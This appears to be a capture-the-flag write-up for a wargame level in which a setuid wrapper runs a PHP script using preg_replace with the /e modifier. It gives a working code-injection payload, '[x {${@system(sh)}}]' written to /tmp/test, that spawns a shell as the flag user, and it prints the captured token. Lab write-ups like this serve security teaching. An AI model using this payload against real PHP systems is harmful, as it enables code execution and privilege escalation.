In home folder we can find two files owned by `flag06` user.  
Command: `ls -l`  
Output:
```
total 12
-rwsr-x---+ 1 flag06 level06 7503 Aug 30  2015 level06
-rwxr-x---  1 flag06 level06  356 Mar  5  2016 level06.php
```

Investigating `level06` binary shows that it just set user and group id and execute `level06.php`.

So it looks the PHP script is vulnerable.

Command: `cat level06.php`
```
#!/usr/bin/php
<?php
function y($m) { 
    $m = preg_replace("/\./", " x ", $m); 
    $m = preg_replace("/@/", " y", $m); 
    return $m; 
}

function x($y, $z) { 
    $a = file_get_contents($y); 
    $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); 
    $a = preg_replace("/\[/", "(", $a); 
    $a = preg_replace("/\]/", ")", $a); 
    return $a; 
}

$r = x($argv[1], $argv[2]); 
print $r;
?>
```

After some investigation, I found out that `preg_replace` function with `/e` flag is deprecated from php.7. Flag `/e` after replacing allows evaluating content.

After some more deep investigation, I found the way how to exploit it.

Create file `/tmp/test` with content - `[x {${@system(sh)}}]`.

Command: `./level06 /tmp/test`  
Command: `getflag`  
Output: `Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub`

Flag: `wiok45aaoguiboiki2tuin6ub`